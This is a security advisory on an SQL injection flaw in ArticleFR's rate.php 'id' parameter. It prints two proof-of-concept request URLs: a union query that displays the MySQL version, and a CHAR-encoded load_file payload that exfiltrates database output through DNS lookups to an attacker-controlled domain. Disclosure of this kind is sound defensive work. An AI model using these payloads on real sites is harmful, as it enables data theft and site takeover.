High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in ArticleFR, which can be exploited to perform SQL Injection attacks and gain complete control over vulnerable website.
The vulnerability exists due to insufficient sanitization of the βidβ HTTP GET parameter passed to β/rate.phpβ script, when βactβ HTTP GET parameter is set to either βgetβ or βsetβ. A remote attacker can send a specially crafted HTTP GET request and execute arbitrary SQL commands in applicationβs database.
The following exploitation example demonstrates vulnerability when βactβ HTTP GET parameter is set to value βgetβ. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version()
(or any other sensetive output from the database) subdomain of β.attacker.comβ (a domain name, DNS server of which is controlled by the attacker):
http://[host]/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20β%202
Below is another exploitation example, which displays version of MySQL server when βactβ HTTP GET parameter is set to value βsetβ:
http://[host]/rate.php?act=set&id=0%20union%20select%201,version%28%29,3,4%2 0β%202